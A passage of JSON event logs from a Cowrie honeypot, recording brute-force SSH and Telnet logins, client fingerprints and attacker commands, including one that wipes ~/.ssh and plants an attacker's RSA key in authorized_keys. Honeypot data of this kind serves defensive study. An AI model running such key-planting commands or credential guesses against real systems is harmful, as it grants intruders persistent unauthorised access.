ert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:12:38.248971Z","src_ip":"212.227.125.160","session":"434baef17257"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:12:38.473157Z","src_ip":"212.227.125.160","session":"434baef17257"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:12:38.807836Z","src_ip":"212.227.125.160","session":"434baef17257"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:12:38.808511Z","src_ip":"212.227.125.160","session":"434baef17257"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:38.883079Z","src_ip":"212.227.125.160","session":"434baef17257"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:38.884164Z","src_ip":"212.227.125.160","session":"434baef17257"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:39.645246Z","src_ip":"212.227.235.229","session":"c6c1ddde4aea"}
{"eventid":"cowrie.session.closed","duration":"30.8","message":"Connection lost after 30.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:43.056510Z","src_ip":"212.227.235.229","session":"790b2dd660cb"}
{"eventid":"cowrie.session.closed","duration":"40.9","message":"Connection lost after 40.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:43.438441Z","src_ip":"212.227.125.160","session":"94e24f899301"}
{"eventid":"cowrie.session.connect","src_ip":"45.227.254.156","src_port":11077,"dst_ip":"1.2.3.4","dst_port":23,"session":"c46de66a1f03","protocol":"telnet","message":"New connection: 45.227.254.156:11077 (1.2.3.4:23) [session: c46de66a1f03]","sensor":"my-vps","timestamp":"2025-08-31T01:12:46.028902Z"}
{"eventid":"cowrie.session.closed","duration":0.0011165142059326172,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:46.029944Z","src_ip":"45.227.254.156","session":"c46de66a1f03"}
{"eventid":"cowrie.session.connect","src_ip":"45.227.254.156","src_port":11128,"dst_ip":"1.2.3.4","dst_port":23,"session":"4ce99cb5037f","protocol":"telnet","message":"New connection: 45.227.254.156:11128 (1.2.3.4:23) [session: 4ce99cb5037f]","sensor":"my-vps","timestamp":"2025-08-31T01:12:46.045589Z"}
{"eventid":"cowrie.session.closed","duration":0.01692056655883789,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:46.062448Z","src_ip":"45.227.254.156","session":"4ce99cb5037f"}
{"eventid":"cowrie.session.connect","src_ip":"45.227.254.156","src_port":11168,"dst_ip":"1.2.3.4","dst_port":23,"session":"d965bf4bf6ff","protocol":"telnet","message":"New connection: 45.227.254.156:11168 (1.2.3.4:23) [session: d965bf4bf6ff]","sensor":"my-vps","timestamp":"2025-08-31T01:12:46.078523Z"}
{"eventid":"cowrie.session.closed","duration":0.016889333724975586,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:46.095349Z","src_ip":"45.227.254.156","session":"d965bf4bf6ff"}
{"eventid":"cowrie.session.connect","src_ip":"194.0.234.18","src_port":39541,"dst_ip":"1.2.3.4","dst_port":22,"session":"771d96a8da59","protocol":"ssh","message":"New connection: 194.0.234.18:39541 (1.2.3.4:22) [session: 771d96a8da59]","sensor":"my-vps","timestamp":"2025-08-31T01:12:47.923702Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.8.1_DEV","message":"Remote SSH version: SSH-2.0-libssh2_1.8.1_DEV","sensor":"my-vps","timestamp":"2025-08-31T01:12:47.925595Z","src_ip":"194.0.234.18","session":"771d96a8da59"}
{"eventid":"cowrie.client.kex","hassh":"2311efe7204dfc3007bb4ce758ac6a98","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc,none;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com,none;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc","none"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com","none"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2311efe7204dfc3007bb4ce758ac6a98","sensor":"my-vps","timestamp":"2025-08-31T01:12:47.939695Z","src_ip":"194.0.234.18","session":"771d96a8da59"}
{"eventid":"cowrie.login.failed","username":"git","password":"GIT","message":"login attempt [git/GIT] failed","sensor":"my-vps","timestamp":"2025-08-31T01:12:48.040275Z","src_ip":"194.0.234.18","session":"771d96a8da59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36670,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa664bd2555c","protocol":"ssh","message":"New connection: 212.227.125.160:36670 (1.2.3.4:22) [session: aa664bd2555c]","sensor":"my-vps","timestamp":"2025-08-31T01:12:48.601425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:12:48.602295Z","src_ip":"212.227.125.160","session":"aa664bd2555c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:12:48.676682Z","src_ip":"212.227.125.160","session":"aa664bd2555c"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123qwe","message":"login attempt [oracle/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-31T01:12:48.901746Z","src_ip":"212.227.125.160","session":"aa664bd2555c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:49.056136Z","src_ip":"194.0.234.18","session":"771d96a8da59"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:50.061417Z","src_ip":"212.227.125.160","session":"aa664bd2555c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48888,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d3752a78639","protocol":"ssh","message":"New connection: 212.227.235.229:48888 (1.2.3.4:22) [session: 1d3752a78639]","sensor":"my-vps","timestamp":"2025-08-31T01:12:50.861902Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:12:50.862640Z","src_ip":"212.227.235.229","session":"1d3752a78639"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:12:51.101835Z","src_ip":"212.227.235.229","session":"1d3752a78639"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59808,"dst_ip":"1.2.3.4","dst_port":23,"session":"bc7204bb7793","protocol":"telnet","message":"New connection: 212.227.235.229:59808 (1.2.3.4:23) [session: bc7204bb7793]","sensor":"my-vps","timestamp":"2025-08-31T01:12:51.347734Z"}
{"eventid":"cowrie.login.success","username":"root","password":"abcd12345678","message":"login attempt [root/abcd12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:12:52.097239Z","src_ip":"212.227.235.229","session":"1d3752a78639"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:12:53.045662Z","src_ip":"212.227.235.229","session":"1d3752a78639"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:12:53.046415Z","src_ip":"212.227.235.229","session":"1d3752a78639"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:12:53.047622Z","src_ip":"212.227.235.229","session":"1d3752a78639"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60832,"dst_ip":"1.2.3.4","dst_port":22,"session":"4866b8f1a21a","protocol":"ssh","message":"New connection: 212.227.125.160:60832 (1.2.3.4:22) [session: 4866b8f1a21a]","sensor":"my-vps","timestamp":"2025-08-31T01:12:53.049890Z"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":49518,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea0d70fe55b4","protocol":"ssh","message":"New connection: 102.88.137.80:49518 (1.2.3.4:22) [session: ea0d70fe55b4]","sensor":"my-vps","timestamp":"2025-08-31T01:12:53.189235Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:12:53.197253Z","src_ip":"102.88.137.80","session":"ea0d70fe55b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:53.290234Z","src_ip":"212.227.235.229","session":"1d3752a78639"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:12:53.319250Z","src_ip":"102.88.137.80","session":"ea0d70fe55b4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:12:53.410235Z","src_ip":"212.227.125.160","session":"4866b8f1a21a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:12:53.410999Z","src_ip":"212.227.125.160","session":"4866b8f1a21a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:12:53.801151Z","src_ip":"212.227.235.229","session":"1d3752a78639"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:12:53.802104Z","src_ip":"212.227.235.229","session":"1d3752a78639"}
{"eventid":"cowrie.login.success","username":"root","password":"lyp82Nlf##^^","message":"login attempt [root/lyp82Nlf##^^] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:12:53.808857Z","src_ip":"102.88.137.80","session":"ea0d70fe55b4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:12:54.051017Z","src_ip":"212.227.235.229","session":"1d3752a78639"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:54.051896Z","src_ip":"212.227.235.229","session":"1d3752a78639"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:12:54.074708Z","src_ip":"102.88.137.80","session":"ea0d70fe55b4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:12:54.075371Z","src_ip":"102.88.137.80","session":"ea0d70fe55b4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:12:54.076212Z","src_ip":"102.88.137.80","session":"ea0d70fe55b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:54.199952Z","src_ip":"102.88.137.80","session":"ea0d70fe55b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50338,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f1095b8b045","protocol":"ssh","message":"New connection: 212.227.235.229:50338 (1.2.3.4:22) [session: 0f1095b8b045]","sensor":"my-vps","timestamp":"2025-08-31T01:12:54.285810Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:12:54.286783Z","src_ip":"212.227.235.229","session":"0f1095b8b045"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:12:54.507031Z","src_ip":"102.88.137.80","session":"ea0d70fe55b4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:12:54.507755Z","src_ip":"102.88.137.80","session":"ea0d70fe55b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:12:54.523927Z","src_ip":"212.227.235.229","session":"0f1095b8b045"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:12:54.632445Z","src_ip":"102.88.137.80","session":"ea0d70fe55b4"}
